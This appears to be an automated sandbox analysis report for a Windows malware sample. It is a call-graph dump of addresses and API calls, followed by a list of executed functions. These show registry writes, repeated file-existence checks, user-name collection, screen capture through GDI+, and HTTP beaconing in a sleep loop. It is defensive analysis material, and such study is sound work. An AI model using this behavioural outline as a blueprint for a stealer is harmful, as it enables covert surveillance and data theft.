76949f GetModuleHandleA GetProcAddress 29877->29878 29880 7694c5 _Ref_count_obj 29878->29880 29881 769546 _Ref_count_obj 29880->29881 29882 769a14 29880->29882 29883 769577 GetSystemInfo 29881->29883 29884 769573 GetNativeSystemInfo 29881->29884 29885 78ea38 25 API calls 29882->29885 29888 76957d 29883->29888 29884->29888 29886 769a19 29885->29886 29887 78ea38 25 API calls 29886->29887 29889 769a1e 29887->29889 29890 7695df 29888->29890 29891 7696b9 29888->29891 29913 769588 _Ref_count_obj 29888->29913 29892 783030 70 API calls 29890->29892 29893 783030 70 API calls 29891->29893 29894 769600 29892->29894 29895 7696e5 29893->29895 29896 7661f0 114 API calls 29894->29896 29897 7661f0 114 API calls 29895->29897 29898 769607 29896->29898 29899 7696ec 29897->29899 29900 783030 70 API calls 29898->29900 29901 783030 70 API calls 29899->29901 29903 76961f 29900->29903 29902 769704 29901->29902 29904 7661f0 114 API calls 29902->29904 29905 7661f0 114 API calls 29903->29905 29906 76970b 29904->29906 29908 769626 29905->29908 29907 783030 70 API calls 29906->29907 29910 76973c 29907->29910 30143 79189f 40 API calls 29908->30143 29912 7661f0 114 API calls 29910->29912 29911 769651 29911->29886 29911->29913 29914 769743 29912->29914 29913->29869 30144 7691b0 119 API calls 3 library calls 29914->30144 29916 769752 29917 783030 70 API calls 29916->29917 29918 76978d 29917->29918 29919 7661f0 114 API calls 29918->29919 29920 769794 29919->29920 29921 783030 70 API calls 29920->29921 29922 7697ac 29921->29922 29923 7661f0 114 API calls 29922->29923 29924 7697b3 29923->29924 29925 783030 70 API calls 29924->29925 29926 7697e4 29925->29926 29927 7661f0 114 API calls 29926->29927 29928 7697eb 29927->29928 30145 7691b0 119 API calls 3 library calls 29928->30145 29930 7697fa 29931 783030 70 API calls 29930->29931 29932 769835 29931->29932 29933 7661f0 114 API calls 29932->29933 29934 76983c 29933->29934 29935 783030 70 API calls 29934->29935 29936 769854 29935->29936 29937 7661f0 114 API calls 29936->29937 29938 76985b 29937->29938 29939 783030 70 API calls 29938->29939 29940 76988c 29939->29940 29941 7661f0 114 API calls 29940->29941 29942 769893 29941->29942 30146 7691b0 119 API calls 3 library calls 29942->30146 29944 7698a2 29945 783030 70 API calls 29944->29945 29946 7698dd 29945->29946 29947 7661f0 114 API calls 29946->29947 29948 7698e4 29947->29948 29949 783030 70 API calls 29948->29949 29950 7698fc 29949->29950 29951 7661f0 114 API calls 29950->29951 29952 769903 29951->29952 29953 783030 70 API calls 29952->29953 29954 769934 29953->29954 29955 7661f0 114 API calls 29954->29955 29956 76993b 29955->29956 30147 7691b0 119 API calls 3 library calls 29956->30147 29958 76994a 29958->29913 29960 764404 29959->29960 29961 76447d 29960->29961 29962 783f40 27 API calls 29960->29962 29963 7896b0 _ValidateLocalCookies 5 API calls 29961->29963 29962->29961 29964 76448c 29963->29964 29965 769a20 29964->29965 29966 78b340 __fread_nolock 29965->29966 29967 769a85 GetVersionExW 29966->29967 29968 769aa3 29967->29968 29969 769aad 29967->29969 29971 7896b0 _ValidateLocalCookies 5 API calls 29968->29971 29970 783030 70 API calls 29969->29970 29972 769abc 29970->29972 29973 769c05 29971->29973 29974 7661f0 114 API calls 29972->29974 29973->29362 29975 769ac7 29974->29975 29976 783030 70 API calls 29975->29976 29977 769ae9 29976->29977 29978 7661f0 114 API calls 29977->29978 29979 769af4 29978->29979 29980 769aff GetModuleHandleA GetProcAddress 29979->29980 29981 769afd 29979->29981 29982 769b1a _Ref_count_obj 29980->29982 29981->29980 29983 769b97 _Ref_count_obj 29982->29983 29984 769c0c 29982->29984 29985 769bc8 GetSystemInfo 29983->29985 29987 769bc4 29983->29987 29986 78ea38 25 API calls 29984->29986 29985->29987 29988 769c11 29986->29988 29987->29968 29990 76b2e0 29989->29990 29990->29990 29991 76b331 29990->29991 29992 76b4ab 29990->29992 29998 76b2f4 _Yarn 29990->29998 30162 7853d0 27 API calls std::_Facet_Register 29991->30162 30163 7626a0 27 API calls 29992->30163 29994 76b4b0 29997 78ea38 25 API calls 29994->29997 29999 76b4b5 29997->29999 30148 782d00 29998->30148 30000 76b483 _Ref_count_obj 30001 7896b0 _ValidateLocalCookies 5 API calls 30000->30001 30003 76b4a7 30001->30003 30002 76b3e7 30002->29994 30002->30000 30004 76b700 30003->30004 30005 783030 70 API calls 30004->30005 30006 76b742 30005->30006 30007 7661f0 114 API calls 30006->30007 30008 76b74a 30007->30008 30168 76a270 GetTempPathA 30008->30168 30011 785430 27 API calls 30012 76b76f GetFileAttributesA 30011->30012 30016 76b788 _Ref_count_obj 30012->30016 30013 76c689 30015 78ea38 25 API calls 30013->30015 30014 76b853 _Ref_count_obj 30017 76b861 30014->30017 30019 783030 70 API calls 30014->30019 30018 76c6c5 30015->30018 30016->30013 30016->30014 30021 783f40 27 API calls 30017->30021 30020 76b87c 30019->30020 30022 7661f0 114 API calls 30020->30022 30023 76c675 GetModuleFileNameA 30021->30023 30024 76b884 30022->30024 30023->29382 30025 76a270 115 API calls 30024->30025 30026 76b898 30025->30026 30027 785430 27 API calls 30026->30027 30028 76b8a9 GetFileAttributesA 30027->30028 30029 76b8c2 _Ref_count_obj 30028->30029 30029->30017 30030 783030 70 API calls 30029->30030 30031 76b9b6 30030->30031 30032 7661f0 114 API calls 30031->30032 30033 76b9be 30032->30033 30034 76a270 115 API calls 30033->30034 30035 76b9d2 30034->30035 30036 785430 27 API calls 30035->30036 30037 76b9e3 GetFileAttributesA 30036->30037 30038 76b9fc _Ref_count_obj 30037->30038 30038->30017 30039 783030 70 API calls 30038->30039 30040 76baf0 30039->30040 30041 7661f0 114 API calls 30040->30041 30042 76baf8 30041->30042 30043 76a270 115 API calls 30042->30043 30044 76bb0c 30043->30044 30045 785430 27 API calls 30044->30045 30046 76bb1d GetFileAttributesA 30045->30046 30048 76bb36 _Ref_count_obj 30046->30048 30047 783030 70 API calls 30049 76bc2a 30047->30049 30048->30017 30048->30047 30050 7661f0 114 API calls 30049->30050 30051 76bc32 30050->30051 30052 76a270 115 API calls 30051->30052 30053 76bc46 30052->30053 30054 785430 27 API calls 30053->30054 30055 76bc57 GetFileAttributesA 30054->30055 30057 76bc70 _Ref_count_obj 30055->30057 30056 783030 70 API calls 30058 76bd64 30056->30058 30057->30017 30057->30056 30059 7661f0 114 API calls 30058->30059 30060 76bd6c 30059->30060 30061 76a270 115 API calls 30060->30061 30062 76bd80 30061->30062 30063 785430 27 API calls 30062->30063 30064 76bd91 GetFileAttributesA 30063->30064 30066 76bdaa _Ref_count_obj 30064->30066 30065 783030 70 API calls 30067 76be9e 30065->30067 30066->30017 30066->30065 30068 7661f0 114 API calls 30067->30068 30069 76bea6 30068->30069 30070 76a270 115 API calls 30069->30070 30071 76beba 30070->30071 30072 785430 27 API calls 30071->30072 30073 76becb GetFileAttributesA 30072->30073 30074 76bee4 _Ref_count_obj 30073->30074 30074->30017 30075 783030 70 API calls 30074->30075 30076 76bfd8 30075->30076 30077 7661f0 114 API calls 30076->30077 30078 76bfe0 30077->30078 30079 76a270 115 API calls 30078->30079 30080 76bff4 30079->30080 30081 785430 27 API calls 30080->30081 30082 76c005 GetFileAttributesA 30081->30082 30083 76c01e _Ref_count_obj 30082->30083 30083->30017 30084 783030 70 API calls 30083->30084 30085 76c112 30084->30085 30086 7661f0 114 API calls 30085->30086 30087 76c11a 30086->30087 30088 76a270 115 API calls 30087->30088 30089 76c12e 30088->30089 30090 785430 27 API calls 30089->30090 30091 76c13f GetFileAttributesA 30090->30091 30092 76c158 _Ref_count_obj 30091->30092 30092->30017 30093 783030 70 API calls 30092->30093 30094 76c24c 30093->30094 30095 7661f0 114 API calls 30094->30095 30096 76c254 30095->30096 30097 76a270 115 API calls 30096->30097 30098 76c268 30097->30098 30099 785430 27 API calls 30098->30099 30100 76c279 GetFileAttributesA 30099->30100 30101 76c292 _Ref_count_obj 30100->30101 30101->30017 30102 783030 70 API calls 30101->30102 30103 76c386 30102->30103 30104 7661f0 114 API calls 30103->30104 30105 76c38e 30104->30105 30106 76a270 115 API calls 30105->30106 30107 76c3a2 30106->30107 30108 785430 27 API calls 30107->30108 30109 76c3b3 GetFileAttributesA 30108->30109 30110 76c3cc _Ref_count_obj 30109->30110 30110->30017 30111 783030 70 API calls 30110->30111 30112 76c4c0 30111->30112 30113 7661f0 114 API calls 30112->30113 30114 76c4cb 30113->30114 30115 76a270 115 API calls 30114->30115 30116 76c4e2 30115->30116 30117 785430 27 API calls 30116->30117 30118 76c4f3 GetFileAttributesA 30117->30118 30119 76c50c _Ref_count_obj 30118->30119 30119->30017 30120 7693d0 124 API calls 30119->30120 30121 76c61a 30120->30121 30121->30017 30122 7693d0 124 API calls 30121->30122 30123 76c624 30122->30123 30123->30017 30124 7693d0 124 API calls 30123->30124 30125 76c62e 30124->30125 30125->30017 30126 7693d0 124 API calls 30125->30126 30127 76c638 30126->30127 30127->30017 30128 7693d0 124 API calls 30127->30128 30128->30017 30130 769e46 30129->30130 30131 769e78 _Ref_count_obj 30130->30131 30133 769e93 30130->30133 30132 7896b0 _ValidateLocalCookies 5 API calls 30131->30132 30134 769e8f 30132->30134 30135 78ea38 25 API calls 30133->30135 30134->29387 30136 769e98 30135->30136 30137->29502 30138->29505 30139->29864 30142 769436 GetVersionExW 30141->30142 30142->29868 30142->29913 30143->29911 30144->29916 30145->29930 30146->29944 30147->29958 30150 782d1b 30148->30150 30161 782e04 _Yarn _Ref_count_obj 30148->30161 30149 782e91 30166 7626a0 27 API calls 30149->30166 30150->30149 30153 782d9b _Yarn 30150->30153 30154 782d8a 30150->30154 30155 782db1 30150->30155 30150->30161 30152 782e96 30167 7625c0 27 API calls 2 library calls 30152->30167 30160 78ea38 25 API calls 30153->30160 30153->30161 30154->30152 30164 7625c0 27 API calls 4 library calls 30154->30164 30155->30153 30165 7625c0 27 API calls 4 library calls 30155->30165 30157 782e9b 30160->30149 30161->30002 30162->29998 30164->30153 30165->30153 30167->30157 30169 783030 70 API calls 30168->30169 30170 76a2cc 30169->30170 30171 7661f0 114 API calls 30170->30171 30172 76a2d7 30171->30172 30173 783f40 27 API calls 30172->30173 30174 76a32d 30173->30174 30175 783f40 27 API calls 30174->30175 30176 76a389 30175->30176 30177 785430 27 API calls 30176->30177 30179 76a3a2 _Ref_count_obj 30177->30179 30178 76a465 30182 78ea38 25 API calls 30178->30182 30179->30178 30180 76a43e _Ref_count_obj 30179->30180 30181 7896b0 _ValidateLocalCookies 5 API calls 30180->30181 30183 76a461 30181->30183 30184 76a46a 30182->30184 30183->30011 30188 7808d0 30185->30188 30186 783030 70 API calls 30186->30188 30187 7661f0 114 API calls 30187->30188 30188->30186 30188->30187 30203 77e850 30188->30203 30190 78091c Sleep 30190->30188 30194 780960 30191->30194 30192 783030 70 API calls 30192->30194 30193 7661f0 114 API calls 30193->30194 30194->30192 30194->30193 30195 77e850 157 API calls 30194->30195 30196 7809ac Sleep 30195->30196 30196->30194 30200 7809f0 30197->30200 30198 783030 70 API calls 30198->30200 30199 7661f0 114 API calls 30199->30200 30200->30198 30200->30199 30201 77e850 157 API calls 30200->30201 30202 780a3c Sleep 30201->30202 30202->30200 30204 77e88c 30203->30204 30208 77ef7e _Ref_count_obj 30203->30208 30205 783030 70 API calls 30204->30205 30204->30208 30209 77e8ad 30205->30209 30206 77eff4 _Ref_count_obj 30210 7896b0 _ValidateLocalCookies 5 API calls 30206->30210 30207 77f051 30212 78ea38 25 API calls 30207->30212 30208->30206 30208->30207 30213 7661f0 114 API calls 30209->30213 30211 77f016 30210->30211 30211->30190 30217 77f056 30212->30217 30214 77e8b4 30213->30214 30215 783030 70 API calls 30214->30215 30216 77e8c6 30215->30216 30218 783030 70 API calls 30216->30218 30219 7678e0 27 API calls 30217->30219 30220 77e8d8 30218->30220 30221 77f0a8 30219->30221 30507 770370 30220->30507 30223 782f70 25 API calls 30221->30223 30225 77f0b6 30223->30225 30228 77f0e6 _Ref_count_obj 30225->30228 30233 78087a 30225->30233 30226 783030 70 API calls 30227 77e8f9 30226->30227 30230 783030 70 API calls 30227->30230 30229 7693d0 124 API calls 30228->30229 30231 77f0f5 30229->30231 30232 77e911 30230->30232 30234 7643e0 27 API calls 30231->30234 30235 7661f0 114 API calls 30232->30235 30236 78ea38 25 API calls 30233->30236 30237 77f102 30234->30237 30238 77e918 30235->30238 30239 780893 30236->30239 30240 769a20 118 API calls 30237->30240 30538 769c20 30238->30538 30242 77f10e 30240->30242 30244 7643e0 27 API calls 30242->30244 30246 77f11b RegOpenKeyExA RegCloseKey 30244->30246 30245 77eba5 30248 783030 70 API calls 30245->30248 30329 77f038 30245->30329 30249 7643e0 27 API calls 30246->30249 30247 783030 70 API calls 30250 77e940 30247->30250 30251 77ebcb 30248->30251 30252 77f16b 30249->30252 30253 783030 70 API calls 30250->30253 30254 783030 70 API calls 30251->30254 30256 783030 70 API calls 30252->30256 30257 77e958 30253->30257 30255 77ebe0 30254->30255 30258 783030 70 API calls 30255->30258 30259 77f189 30256->30259 30260 7661f0 114 API calls 30257->30260 30261 77ebf2 30258->30261 30262 7661f0 114 API calls 30259->30262 30263 77e95f 30260->30263 30264 770370 121 API calls 30261->30264 30265 77f190 30262->30265 30266 769c20 27 API calls 30263->30266 30267 77ebfe 30264->30267 30268 783030 70 API calls 30265->30268 30269 77e96b 30266->30269 30270 783030 70 API calls 30267->30270 30271 77f1a5 30268->30271 30269->30245 30273 783030 70 API calls 30269->30273 30274 77ec13 30270->30274 30272 7661f0 114 API calls 30271->30272 30275 77f1ac 30272->30275 30276 77e988 30273->30276 30277 783030 70 API calls 30274->30277 30280 77f1c3 GetUserNameA 30275->30280 30278 7661f0 114 API calls 30276->30278 30279 77ec2b 30277->30279 30286 77e990 30278->30286 30281 7661f0 114 API calls 30279->30281 30282 77f216 30280->30282 30283 77ec32 30281->30283 30282->30282 30285 783f40 27 API calls 30282->30285 30284 769c20 27 API calls 30283->30284 30287 77ec3e 30284->30287 30288 77f232 30285->30288 30289 77e9e1 30286->30289 30290 77f01a 30286->30290 30294 783030 70 API calls 30287->30294 30302 77ef0e _Ref_count_obj 30287->30302 30292 76b250 28 API calls 30288->30292 30293 783f40 27 API calls 30289->30293 30553 784450 27 API calls 30290->30553 30296 77f241 30292->30296 30297 77e9fe 30293->30297 30298 77ec5a 30294->30298 30295 77f01f 30300 78ea38 25 API calls 30295->30300 30303 76b700 137 API calls 30296->30303 30304 782f70 25 API calls 30297->30304 30299 783030 70 API calls 30298->30299 30305 77ec72 30299->30305 30307 77f024 30300->30307 30301 77f04c 30306 78ea38 25 API calls 30301->30306 30302->30208 30302->30301 30308 77f250 GetModuleFileNameA 30303->30308 30315 77ea0a _Ref_count_obj 30304->30315 30309 7661f0 114 API calls 30305->30309 30306->30207 30310 78ea38 25 API calls 30307->30310 30311 77f293 30308->30311 30312 77ec79 30309->30312 30314 77f029 30310->30314 30311->30311 30319 783f40 27 API calls 30311->30319 30316 769c20 27 API calls 30312->30316 30313 77ea6c _Ref_count_obj 30318 783030 70 API calls 30313->30318 30554 78834c 27 API calls 2 library calls 30314->30554 30315->30295 30315->30313 30320 77ec85 30316->30320 30322 77ea85 30318->30322 30323 77f2ab 30319->30323 30320->30302 30328 783030 70 API calls 30320->30328 30321 77f033 30555 784450 27 API calls 30321->30555 30326 7661f0 114 API calls 30322->30326 30324 769e20 25 API calls 30323->30324 30327 77f2b0 30324->30327 30336 77ea8d 30326->30336 30330 7643e0 27 API calls 30327->30330 30331 77eca2 30328->30331 30556 78838c 27 API calls 2 library calls 30329->30556 30333 77f2cd 30330->30333 30334 7661f0 114 API calls 30331->30334 30337 783030 70 API calls 30333->30337 30347 77ecaa 30334->30347 30335 77f042 30338 78ea38 25 API calls 30335->30338 30339 783f40 27 API calls 30336->30339 30340 77f2e7 30337->30340 30341 77f047 30338->30341 30343 77eaeb 30339->30343 30344 7661f0 114 API calls 30340->30344 30342 78ea38 25 API calls 30341->30342 30342->30301 30345 782f70 25 API calls 30343->30345 30346 77f2f2 30344->30346 30356 77eaf7 _Ref_count_obj 30345->30356 30348 7643e0 27 API calls 30346->30348 30347->30321 30349 77ecfb 30347->30349 30351 77f309 30348->30351 30350 783f40 27 API calls 30349->30350 30352 77ed18 30350->30352 30353 783030 70 API calls 30351->30353 30355 782f70 25 API calls 30352->30355 30357 77f31f 30353->30357 30354 77eb59 _Ref_count_obj 30354->30245 30550 76b5f0 114 API calls 3 library calls 30354->30550 30366 77ed24 _Ref_count_obj 30355->30366 30356->30307 30356->30354 30359 7661f0 114 API calls 30357->30359 30361 77f32a 30359->30361 30360 77eb71 30360->30245 30551 790c72 14 API calls __dosmaperr 30360->30551 30363 783030 70 API calls 30361->30363 30362 77ed86 _Ref_count_obj 30364 783030 70 API calls 30362->30364 30367 77f34d 30363->30367 30369 77ed9f 30364->30369 30366->30335 30366->30362 30368 7661f0 114 API calls 30367->30368 30371 77f358 30368->30371 30372 7661f0 114 API calls 30369->30372 30370 77eb7a 30373 7915a7 40 API calls 30370->30373 30374 783030 70 API calls 30371->30374 30379 77eda7 30372->30379 30375 77eb99 30373->30375 30376 77f37b 30374->30376 30375->30245 30375->30314 30377 7661f0 114 API calls 30376->30377 30378 77f386 30377->30378 30380 783030 70 API calls 30378->30380 30381 783f40 27 API calls 30379->30381 30382 77f3a9 30380->30382 30383 77ee05 30381->30383 30384 7661f0 114 API calls 30382->30384 30385 782f70 25 API calls 30383->30385 30386 77f3b4 30384->30386 30390 77ee11 _Ref_count_obj 30385->30390 30387 783030 70 API calls 30386->30387 30389 77f3d7 30387->30389 30388 77ee73 _Ref_count_obj 30391 783030 70 API calls 30388->30391 30392 7661f0 114 API calls 30389->30392 30390->30341 30390->30388 30393 77ee8e 30391->30393 30394 77f3e2 30392->30394 30395 783030 70 API calls 30393->30395 30396 783030 70 API calls 30394->30396 30397 77eea3 30395->30397 30398 77f405 30396->30398 30400 783030 70 API calls 30397->30400 30399 7661f0 114 API calls 30398->30399 30401 77f410 30399->30401 30402 77eebe 30400->30402 30403 783030 70 API calls 30401->30403 30404 7661f0 114 API calls 30402->30404 30405 77f433 30403->30405 30406 77eec5 30404->30406 30407 7661f0 114 API calls 30405->30407 30410 783f40 27 API calls 30406->30410 30409 77f43e 30407->30409 30411 783030 70 API calls 30409->30411 30412 77ef02 30410->30412 30413 77f461 30411->30413 30552 77e420 153 API calls 3 library calls 30412->30552 30415 7661f0 114 API calls 30413->30415 30417 77f46c 30415->30417 30416 77ef0b 30416->30302 30418 783030 70 API calls 30417->30418 30419 77f48d 30418->30419 30420 7661f0 114 API calls 30419->30420 30421 77f498 30420->30421 30422 783030 70 API calls 30421->30422 30423 77f4aa 30422->30423 30424 7661f0 114 API calls 30423->30424 30425 77f4b5 30424->30425 30426 783030 70 API calls 30425->30426 30427 77f4c7 30426->30427 30428 7661f0 114 API calls 30427->30428 30429 77f4d2 30428->30429 30430 783030 70 API calls 30429->30430 30431 77f4ef 30430->30431 30432 7661f0 114 API calls 30431->30432 30433 77f4fa 30432->30433 30434 7845e0 27 API calls 30433->30434 30435 77f50e 30434->30435 30436 785430 27 API calls 30435->30436 30437 77f528 30436->30437 30438 785430 27 API calls 30437->30438 30439 77f545 30438->30439 30440 785430 27 API calls 30439->30440 30441 77f562 30440->30441 30442 7845e0 27 API calls 30441->30442 30443 77f577 30442->30443 30444 785430 27 API calls 30443->30444 30445 77f596 30444->30445 30446 7845e0 27 API calls 30445->30446 30447 77f5ab 30446->30447 30448 785430 27 API calls 30447->30448 30449 77f5ca 30448->30449 30450 7845e0 27 API calls 30449->30450 30451 77f5df 30450->30451 30452 785430 27 API calls 30451->30452 30453 77f5fe 30452->30453 30454 7845e0 27 API calls 30453->30454 30455 77f613 30454->30455 30456 785430 27 API calls 30455->30456 30457 77f632 30456->30457 30458 7845e0 27 API calls 30457->30458 30459 77f647 30458->30459 30460 785430 27 API calls 30459->30460 30461 77f666 30460->30461 30462 7845e0 27 API calls 30461->30462 30463 77f67b 30462->30463 30464 785430 27 API calls 30463->30464 30465 77f69a 30464->30465 30466 7845e0 27 API calls 30465->30466 30467 77f6af 30466->30467 30468 785430 27 API calls 30467->30468 30469 77f6ce 30468->30469 30470 7845e0 27 API calls 30469->30470 30471 77f6e3 30470->30471 30472 785430 27 API calls 30471->30472 30473 77f702 30472->30473 30474 785430 27 API calls 30473->30474 30475 77f724 30474->30475 30476 785430 27 API calls 30475->30476 30477 77f746 30476->30477 30478 7845e0 27 API calls 30477->30478 30483 77f75b _Ref_count_obj 30478->30483 30479 780458 30482 783030 70 API calls 30479->30482 30480 780383 30481 783030 70 API calls 30480->30481 30484 780399 30481->30484 30485 78046d 30482->30485 30483->30479 30483->30480 30486 7661f0 114 API calls 30484->30486 30487 783030 70 API calls 30485->30487 30488 7803a4 30486->30488 30489 780482 30487->30489 30490 7845e0 27 API calls 30488->30490 30557 764d60 27 API calls _Ref_count_obj 30489->30557 30492 7803b8 30490->30492 30494 782f70 25 API calls 30492->30494 30493 780491 30558 76cb00 27 API calls 30493->30558 30499 7803c6 _Ref_count_obj 30494->30499 30496 7804a2 30497 783030 70 API calls 30496->30497 30498 7804b7 30497->30498 30500 7661f0 114 API calls 30498->30500 30505 7896b0 _ValidateLocalCookies 5 API calls 30499->30505 30501 7804c2 30500->30501 30502 785430 27 API calls 30501->30502 30503 7804dc 30502->30503 30504 782f70 25 API calls 30503->30504 30504->30499 30506 780876 30505->30506 30506->30190 30508 7707c7 30507->30508 30509 7703c2 30507->30509 30510 783f40 27 API calls 30508->30510 30509->30508 30511 7703d6 Sleep InternetOpenW InternetConnectA 30509->30511 30516 770774 _Ref_count_obj 30510->30516 30512 783030 70 API calls 30511->30512 30513 770462 30512->30513 30514 7661f0 114 API calls 30513->30514 30518 77046d HttpOpenRequestA 30514->30518 30515 77089b 30519 78ea38 25 API calls 30515->30519 30516->30515 30520 7707c2 _Ref_count_obj 30516->30520 30517 7896b0 _ValidateLocalCookies 5 API calls 30521 770888 30517->30521 30526 770496 _Ref_count_obj 30518->30526 30523 7708a0 30519->30523 30520->30517 30521->30226 30524 783030 70 API calls 30525 7704fe 30524->30525 30527 7661f0 114 API calls 30525->30527 30526->30524 30528 770509 30527->30528 30529 783030 70 API calls 30528->30529 30530 770522 30529->30530 30531 7661f0 114 API calls 30530->30531 30532 77052d HttpSendRequestA 30531->30532 30535 770550 _Ref_count_obj 30532->30535 30534 7705d8 InternetReadFile 30536 7705ff _Yarn 30534->30536 30535->30534 30537 77067f InternetReadFile 30536->30537 30537->30536 30539 769d43 _Ref_count_obj 30538->30539 30540 769c7c _Ref_count_obj 30538->30540 30544 769de3 _Ref_count_obj 30539->30544 30545 769e0f 30539->30545 30540->30539 30541 769e0a 30540->30541 30542 783f40 27 API calls 30540->30542 30540->30545 30559 784450 27 API calls 30541->30559 30542->30540 30546 7896b0 _ValidateLocalCookies 5 API calls 30544->30546 30547 78ea38 25 API calls 30545->30547 30548 769e06 30546->30548 30549 769e14 30547->30549 30548->30245 30548->30247 30550->30360 30551->30370 30552->30416 30557->30493 30558->30496 30560 790042 30561 79005e 30560->30561 30562 790050 30560->30562 30573 78e60c 30561->30573 30563 7900b4 57 API calls 30562->30563 30565 79005a 30563->30565 30569 79008c 30571 797c06 _free 14 API calls 30569->30571 30572 7900ae 30569->30572 30571->30572 30574 78dee7 __cftoe 37 API calls 30573->30574 30575 78e61e 30574->30575 30576 78e630 30575->30576 30604 79825f 5 API calls std::_Locinfo::_Locinfo_ctor 30575->30604 30578 78e5ef 30576->30578 30605 78e53d 30578->30605 30581 7900b4 30582 7900df __fread_nolock 30581->30582 30583 7900c2 30581->30583 30587 790121 CreateFileW 30582->30587 30588 790105 30582->30588 30656 790c5f 14 API calls __dosmaperr 30583->30656 30585 7900c7 30657 790c72 14 API calls __dosmaperr 30585->30657 30589 790153 30587->30589 30590 790145 30587->30590 30659 790c5f 14 API calls __dosmaperr 30588->30659 30662 790192 49 API calls __dosmaperr 30589->30662 30630 79021c GetFileType 30590->30630 30591 7900cf 30658 78ea28 25 API calls __wsopen_s 30591->30658 30596 79010a 30660 790c72 14 API calls __dosmaperr 30596->30660 30597 7900da 30597->30569 30599 790111 30661 78ea28 25 API calls __wsopen_s 30599->30661 30600 79014e __fread_nolock 30602 79011c 30600->30602 30603 790184 CloseHandle 30600->30603 30602->30569 30603->30602 30604->30576 30606 78e54b 30605->30606 30607 78e565 30605->30607 30623 78e64b 14 API calls _free 30606->30623 30609 78e58b 30607->30609 30610 78e56c 30607->30610 30625 797e83 MultiByteToWideChar 30609->30625 30622 78e555 30610->30622 30624 78e665 15 API calls __wsopen_s 30610->30624 30613 78e59a 30614 78e5a1 GetLastError 30613->30614 30621 78e5c7 30613->30621 30628 78e665 15 API calls __wsopen_s 30613->30628 30626 790c3c 14 API calls 2 library calls 30614->30626 30617 78e5ad 30627 790c72 14 API calls __dosmaperr 30617->30627 30619 78e5de 30619->30614 30619->30622 30621->30622 30629 797e83 MultiByteToWideChar 30621->30629 30622->30569 30622->30581 30623->30622 30624->30622 30625->30613 30626->30617 30627->30622 30628->30621 30629->30619 30631 790309 30630->30631 30632 790257 30630->30632 30634 790335 30631->30634 30637 790313 30631->30637 30633 790271 __fread_nolock 30632->30633 30680 790592 21 API calls __dosmaperr 30632->30680 30638 790290 GetFileInformationByHandle 30633->30638 30647 790300 30633->30647 30635 79035f PeekNamedPipe 30634->30635 30634->30647 30635->30647 30639 790317 30637->30639 30640 790326 GetLastError 30637->30640 30638->30640 30642 7902a6 30638->30642 30682 790c72 14 API calls __dosmaperr 30639->30682 30683 790c3c 14 API calls 2 library calls 30640->30683 30641 7896b0 _ValidateLocalCookies 5 API calls 30645 79038a 30641->30645 30663 7904e4 30642->30663 30645->30600 30647->30641 30651 79038c 7 API calls 30652 7902d6 30651->30652 30653 79038c 7 API calls 30652->30653 30654 7902ed 30653->30654 30681 7904b1 14 API calls _free 30654->30681 30656->30585 30657->30591 30658->30597 30659->30596 30660->30599 30661->30602 30662->30600 30664 7904fa 30663->30664 30672 7902b2 30664->30672 30684 78dff9 38 API calls 3 library calls 30664->30684 30666 79053e 30666->30672 30685 78dff9 38 API calls 3 library calls 30666->30685 30668 79054f 30668->30672 30686 78dff9 38 API calls 3 library calls 30668->30686 30670 790560 30670->30672 30687 78dff9 38 API calls 3 library calls 30670->30687 30673 79038c 30672->30673 30674 7903b2 FileTimeToSystemTime 30673->30674 30675 7903a4 30673->30675 30676 7903c4 SystemTimeToTzSpecificLocalTime 30674->30676 30677 7903aa 30674->30677 30675->30674 30675->30677 30676->30677 30678 7896b0 _ValidateLocalCookies 5 API calls 30677->30678 30679 7902c3 30678->30679 30679->30651 30680->30633 30681->30647 30682->30647 30683->30647 30684->30666 30685->30668 30686->30670 30687->30672

                                                                                                        Executed Functions

                                                                                                        Function 007661F0 Relevance: 99.7, APIs: 40, Strings: 16, Instructions: 1737registrywindowfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                        • RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                        • RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 007664E3
                                                                                                        • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00766511
                                                                                                        • RegCloseKey.ADVAPI32(80000001), ref: 0076651A
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0076663C
                                                                                                        • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0076665F
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 007667BD
                                                                                                          • Part of subcall function 007661F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00766894
                                                                                                          • Part of subcall function 007661F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 007668E0
                                                                                                        • RegCloseKey.ADVAPI32(80000002), ref: 00766668
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00766D5E
                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000,3F07E9DB,00000000), ref: 00766DEA
                                                                                                        • GetDC.USER32(00000000), ref: 00766F62
                                                                                                        • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007671CD
                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00767226
                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 0076722F
                                                                                                        • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 00767277
                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 007672CA
                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 007672D3
                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 007672DF
                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 007672F4
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00767304
                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0076732A
                                                                                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0076733E
                                                                                                        • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 0076735A
